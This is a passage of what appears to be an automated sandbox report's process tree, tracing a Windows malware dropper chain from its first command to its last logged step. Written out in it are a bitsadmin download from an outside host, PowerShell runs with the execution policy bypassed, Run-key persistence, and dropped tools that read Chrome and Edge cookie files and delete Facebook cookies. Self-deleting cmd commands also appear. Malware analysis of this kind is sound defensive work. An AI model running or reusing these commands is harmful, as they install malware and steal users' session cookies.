                                                                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                            7⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:6136
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            7⤵
                                                                                            • Drops file in Program Files directory
                                                                                            PID:772
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            7⤵
                                                                                              PID:6296
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:4416
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:4152
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:1968
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:6504
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:6744
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                        7⤵
                                                                                                          PID:5396
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                            8⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:4340
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:5920
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:4896
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:7120
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:1716
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:2228
                                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                  7⤵
                                                                                                                    PID:6180
                                                                                                                • C:\Users\Admin\Documents\tG6iObmAGaX11buSI23Q6usP.exe
                                                                                                                  "C:\Users\Admin\Documents\tG6iObmAGaX11buSI23Q6usP.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5080
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4608
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5040
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    7⤵
                                                                                                                      PID:4340
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      7⤵
                                                                                                                        PID:5728
                                                                                                                    • C:\Users\Admin\Documents\mBIlmAn3SwRW5L9XM4_Hisb2.exe
                                                                                                                      "C:\Users\Admin\Documents\mBIlmAn3SwRW5L9XM4_Hisb2.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5064
                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                        7⤵
                                                                                                                          PID:2396
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5376
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            8⤵
                                                                                                                              PID:5412
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5940
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5996
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4108
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4908
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5412
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                              8⤵
                                                                                                                                PID:5468
                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:4132
                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3512
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4008
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5836
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                8⤵
                                                                                                                                  PID:4328
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  8⤵
                                                                                                                                    PID:5720
                                                                                                                              • C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe
                                                                                                                                "C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe"
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:580
                                                                                                                                • C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe
                                                                                                                                  "{path}"
                                                                                                                                  7⤵
                                                                                                                                    PID:4328
                                                                                                                                  • C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe
                                                                                                                                    "{path}"
                                                                                                                                    7⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:6004
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im c7ITdNhhcio8ABAfjezodNVE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      8⤵
                                                                                                                                        PID:4184
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im c7ITdNhhcio8ABAfjezodNVE.exe /f
                                                                                                                                          9⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:6120
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          9⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:3716
                                                                                                                                  • C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe
                                                                                                                                    "C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4384
                                                                                                                                    • C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe
                                                                                                                                      "C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops startup file
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:2396
                                                                                                                                  • C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe
                                                                                                                                    "C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2136
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3081U.tmp\AIk1de2B5c8JTfTJCb9GhHAo.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-3081U.tmp\AIk1de2B5c8JTfTJCb9GhHAo.tmp" /SL5="$3020A,138429,56832,C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:1484
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4BUQI.tmp\Setup.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-4BUQI.tmp\Setup.exe" /Verysilent
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:5212
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5496
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            10⤵
                                                                                                                                              PID:5888
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im GameBox64bit.exe /f
                                                                                                                                                11⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5476
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                11⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5056
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                            9⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5516
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              10⤵
                                                                                                                                                PID:5288
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                10⤵
                                                                                                                                                  PID:4872
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5532
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                  10⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5420
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5564
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2845038.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2845038.exe"
                                                                                                                                                  10⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5984
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8227740.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8227740.exe"
                                                                                                                                                  10⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  PID:5932
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5364
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2653054.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2653054.exe"
                                                                                                                                                    10⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6028
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5942205.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5942205.exe"
                                                                                                                                                    10⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6080
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 2024
                                                                                                                                                      11⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4876
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                  9⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5632
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-GT0OR.tmp\GameBoxWin32.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-GT0OR.tmp\GameBoxWin32.tmp" /SL5="$40260,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                    10⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:5744
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-CKMO3.tmp\Daldoula.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-CKMO3.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                      11⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      PID:5472
                                                                                                                                                      • C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe
                                                                                                                                                        "C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                        12⤵
                                                                                                                                                          PID:4780
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-30VP5.tmp\ultramediaburner.tmp
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-30VP5.tmp\ultramediaburner.tmp" /SL5="$40240,281924,62464,C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                            13⤵
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:4164
                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                              14⤵
                                                                                                                                                                PID:5444
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4a-85f8f-6ce-0a4be-aaa1309760dfa\Gagorehepi.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\4a-85f8f-6ce-0a4be-aaa1309760dfa\Gagorehepi.exe"
                                                                                                                                                            12⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            PID:6104
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                              dw20.exe -x -s 1336
                                                                                                                                                              13⤵
                                                                                                                                                                PID:5060
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2e-93f38-151-6f9a2-671493dcb99f9\Muxunyweby.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2e-93f38-151-6f9a2-671493dcb99f9\Muxunyweby.exe"
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5896
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4vbn3t40.11x\GcleanerEU.exe /eufive & exit
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:4840
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:5328
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                        14⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:5100
                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1627977786 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:7092
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exe & exit
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:5388
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exe
                                                                                                                                                                            14⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:4400
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:6464
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                15⤵
                                                                                                                                                                                  PID:6764
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  15⤵
                                                                                                                                                                                    PID:6948
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    15⤵
                                                                                                                                                                                      PID:6872
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe & exit
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:5604
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:5964
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe" -q
                                                                                                                                                                                          15⤵
                                                                                                                                                                                            PID:6152
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exe & exit
                                                                                                                                                                                        13⤵
                                                                                                                                                                                          PID:6160
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exe
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:6328
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:2228
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:5200
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe & exit
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:6436
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:6600
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe"
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      PID:7080
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxtpz2hh.3gv\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:6540
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
